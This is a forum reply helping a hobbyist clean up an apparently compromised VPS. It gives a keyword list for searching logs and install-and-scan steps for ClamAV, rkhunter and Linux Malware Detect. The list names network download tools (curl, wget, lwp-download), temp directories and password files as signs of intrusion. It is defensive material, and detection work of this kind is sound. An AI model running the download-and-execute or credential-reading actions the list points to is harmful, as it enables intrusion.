Quote:
Originally Posted by rustyz82
While I appreciate your advice, and this is probably what I will end up doing, this isn't a critical site/box and I see this as the perfect opportunity to learn. You advice is overall sound but condescending in nature. I personally have this VPS as a hobby and enjoy challenges like this. If this were a critical or at all important machine or website I would say you are 100% correct in your statements about hiring a professional but since its not, I would rather take this as an opportunity to learn and grow as a sysadmin.. and eventually, i'll know what i'm doing. How else, am I going to learn?
|
I didn't mean to sound condescending, sorry.
I just meant to impart the finality of the situation. It is a Great Time to Learn and this is a perfect opportunity.
Sorry for my terse answer. Most folks want a fix, not a path to a solution.
Start with
https://www.linuxquestions.org/quest...erences-45261/
Look for in these keywords in the logs....
PHP Code:
chmod bash curl lwp-request wget lwp-download rm /tmp /var/tmp perl passwd group
clamscan is a great indicator (it doesn't clean anything but has a nice report feature)
Apt-based OS assumed. Else 's/apt/yum/g'
install it using
Code:
sudo apt-get install -y clamav
To manually run a scan, use
Code:
clamscan -ir /path/to/scan/
-i is infected
-r is report
real example of a run:
Code:
----------- SCAN SUMMARY -----------
Known viruses: 4879143
Engine version: 0.98.7
Scanned directories: 5
Scanned files: 34
Infected files: 0
Data scanned: 4.22 MB
Data read: 2.58 MB (ratio 1.63:1)
Time: 31.835 sec (0 m 31 s)
rkhunter 1.4.3
Code:
cd /usr/src/
wget http://rkhunter.cvs.sourceforge.net/viewvc/rkhunter/rkhunter/?view=tar
mv index.html\?view\=tar rkhunter.tar.gz
tar zxf rkhunter.tar.gz
mv rkhunter rkhunter-1-4-3
cd rkhunter-1-4-3
./installer.sh --install
rkhunter --update
Before you scan however, to eliminate false positives on the first run, see
"
What to do with "common" warnings" blurb at
https://help.ubuntu.com/community/RKhunter
LinuxMalwareDetect
Code:
cd /usr/src/
wget http://www.rfxn.com/downloads/maldetect-current.tar.gz
- untar it
- cd into it
- sudo ./install.sh
Finally, update and run
Code:
maldet -du && maldet -a /var/www/
Good Luck and Good Learning!